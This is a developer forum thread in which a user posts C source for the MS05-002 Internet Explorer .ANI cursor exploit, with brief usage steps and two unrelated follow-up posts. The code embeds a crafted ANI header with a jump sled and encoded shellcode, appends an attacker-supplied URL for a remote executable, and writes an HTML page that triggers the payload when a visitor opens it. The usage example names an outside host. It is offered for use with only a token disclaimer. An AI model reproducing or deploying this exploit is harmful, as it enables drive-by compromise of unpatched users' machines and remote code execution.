For c++ programmers only !


DevX Home    Today's Headlines   Articles Archive   Tip Bank   Forums   

Results 1 to 3 of 3

Thread: For c++ programmers only !

  1. #1
    Join Date
    Oct 2005
    Location
    Maady
    Posts
    1,819

    Arrow For c++ programmers only !

    Hey;
    This code simply demonstrat a bug in windows 2000/NT/XP which is execute an "ANI" file (cursor file) when opening a web site containing this script !

    It may be a bit old but still "learnful"

    This bugfoud by *** and the code created by *** finally edited by Amahdy and here u r :

    Code:
    /*Edited By Amahdy That's all !*/
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    
    /* ANI header */
    
    char aniheader[] =
    "\x52\x49\x46\x46\x9c\x18\x00\x00\x41\x43\x4f\x4e\x61\x6e\x69\x68"
    "\x7c\x03\x00\x00\x24\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    
    /* jmp offset, no Jitsu */
    "\x77\x82\x40\x00\xeb\x64\x90\x90\x77\x82\x40\x00\xeb\x64\x90\x90"
    "\xeb\x54\x90\x90\x77\x82\x40\x00\xeb\x54\x90\x90\x77\x82\x40\x00"
    "\xeb\x44\x90\x90\x77\x82\x40\x00\xeb\x44\x90\x90\x77\x82\x40\x00"
    "\xeb\x34\x90\x90\x77\x82\x40\x00\xeb\x34\x90\x90\x77\x82\x40\x00"
    "\xeb\x24\x90\x90\x77\x82\x40\x00\xeb\x24\x90\x90\x77\x82\x40\x00"
    "\xeb\x14\x90\x90\x77\x82\x40\x00\xeb\x14\x90\x90\x77\x82\x40\x00"
    "\x77\x82\x40\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
    
    /* portbind shellcode */
    char shellcode[] =
    "\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4"
    "\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26"
    "\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14"
    "\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E"
    "\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48"
    "\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB"
    "\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65"
    "\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17"
    "\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10"
    "\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1"
    "\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED"
    "\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13"
    "\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17"
    "\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17"
    "\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8"
    "\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE"
    "\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17"
    "\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17"
    "\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40"
    "\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8"
    "\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17"
    "\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17"
    "\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1"
    "\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7"
    "\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92"
    "\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A"
    "\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40"
    "\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50"
    "\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B"
    "\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65"
    "\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72"
    "\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B"
    "\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E"
    "\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72"
    "\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56"
    "\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65"
    "\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73"
    "\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27"
    "\x27\x39\x72\x6F\x72\x17"
    "m00!";
    
    //#define SET_PORTBIND_PORT(buf, port)  *(unsigned short *)(((buf)+300)) = (port)
    
    unsigned char discl[] =
    "This is provided as proof-of-concept code only for educational"
    " purposes and testing by authorized individuals with permission"
    " to do so.";
    
    char html[] =
    "<html>\n"
    "(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit"
    "<br>Edited By Amahdy<br><a href =\""
    "http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx\">"
    "Patch (MS05-002)</a>\n"
    "<script>alert(\"%s\")</script>\n<head>\n\t<style>\n"
    "\t\t* {CURSOR: url(\"%s.ani\")}\n\t</style>\n</head>\n"
    "</html>";
    
    unsigned short
    fixx(unsigned short p)
    {
          unsigned short r = 0;
          r  = (p & 0xFF00) >> 8;
          r |= (p & 0x00FF) << 8;
    
    return r;
    }
    
    void
    usage(char *prog)
    {
          printf("Usage:\n");
          printf("%s <file> <url to file>\n\n", prog);
          printf("eg: %s index \"http://www.blic.net/proggy.exe\"", prog);
          exit(0);
    }
    
    int
    main(int argc, char **argv)
    {
          FILE *fp;
          unsigned short port;
          char f[256+5] = "";
          char anib[912] = "";
    	  char newshellcode[686];
    
          printf("\n(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit\n\n");
    	  printf("\n===Modifed and corrected by Amahdy=====================================\n\n");
          printf("%s\n\n", discl);
    	  if ( (sizeof(shellcode)-1) > (912-sizeof(aniheader)-3) ) {
                  printf("[-] Size of shellcode must be <= 686 bytes\n");
                  return 0;
          }
          if (argc < 3) usage(argv[0]);
    
          if (strlen(argv[1]) > 256) {
                  printf("[-] Size of filename must be <=256 bytes\n");
                  return 0;
          }
    
          /* creating ani file */
          strcpy(f, argv[1]);
    	  strcat(f, ".ani");
          printf("[*] Creating %s file ...", f);
          fp = fopen(f, "wb");
          if (fp == NULL) {
                  printf("\n[-] error: can\'t create file: %s\n", f);
                  return 0;
          }
    
          memset(newshellcode,0x90,sizeof(shellcode)+strlen(  argv[2])+1);
          strcpy(newshellcode,shellcode);
          strcat(newshellcode,argv[2]);
          strcat(newshellcode,"\x01");
          memset(anib, 0x90, 912);
          memcpy(anib, aniheader, sizeof(aniheader)-1);
          memcpy(anib+sizeof(aniheader)-1, newshellcode, sizeof(newshellcode)-1);
          fwrite(anib, 1, 912, fp);
          printf(" Ok\n");
          fclose(fp);
          f[0] = '\0';
          strcpy(f, argv[1]);
          strcat(f, ".html");
          printf("[*] Creating %s file ...", f);
          fp = fopen(f, "wb");
          if (fp == NULL) {
                  printf("\n[-] error: can\'t create file: %s\n", f);
                  return 0;
          }
          sprintf(anib, html, discl, argv[1]);
          fwrite(anib, 1, strlen(anib), fp);
          printf(" Ok\n");
          fclose(fp);
    
    return 0;
    }
    I repeat "Edited and corrected" only okey ?
    I haven't totally upgreated it to C++ but some small portion of it ..
    Now how it works ?
    after making the exe file drag it into the command line and put as arguments file name and webadress ...
    ex:
    Code:
    myfile.exe index 678
    If u have a good installed atispyware/antivirus you will got a clean alert from virus
    Programmer&Cracker CS
    MyBlog:Blog.Amahdy.com
    MyWebsite:www.Amahdy.com

  2. #2
    Join Date
    Oct 2005
    Location
    Maady
    Posts
    1,819

    Arrow

    Must I put this in c++ section ?
    Last edited by Amahdy; 11-01-2007 at 01:27 PM.
    Programmer&Cracker CS
    MyBlog:Blog.Amahdy.com
    MyWebsite:www.Amahdy.com

  3. #3
    Join Date
    Apr 2010
    Posts
    5
    need tha full solution of OOP 3rd edition by robert lafore ?? here is half only

Similar Threads

  1. .NET Programmers Wanted (Java too)
    By Quizboy in forum Careers
    Replies: 0
    Last Post: 09-24-2005, 01:11 PM
  2. Real Programmers
    By pwilmarth in forum .NET
    Replies: 54
    Last Post: 10-01-2003, 01:00 AM
  3. Do REAL VB programmers want VB.NET?
    By Gary Nelson in forum .NET
    Replies: 154
    Last Post: 03-26-2001, 03:05 PM
  4. Incentives for programmers?
    By jason b in forum Careers
    Replies: 8
    Last Post: 02-12-2001, 09:17 PM
  5. Replies: 20
    Last Post: 01-09-2001, 02:35 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
HTML5 Development Center
 
 
FAQ
Latest Articles
Java
.NET
XML
Database
Enterprise
Questions? Contact us.
C++
Web Development
Wireless
Latest Tips
Open Source


   Development Centers

   -- Android Development Center
   -- Cloud Development Project Center
   -- HTML5 Development Center
   -- Windows Mobile Development Center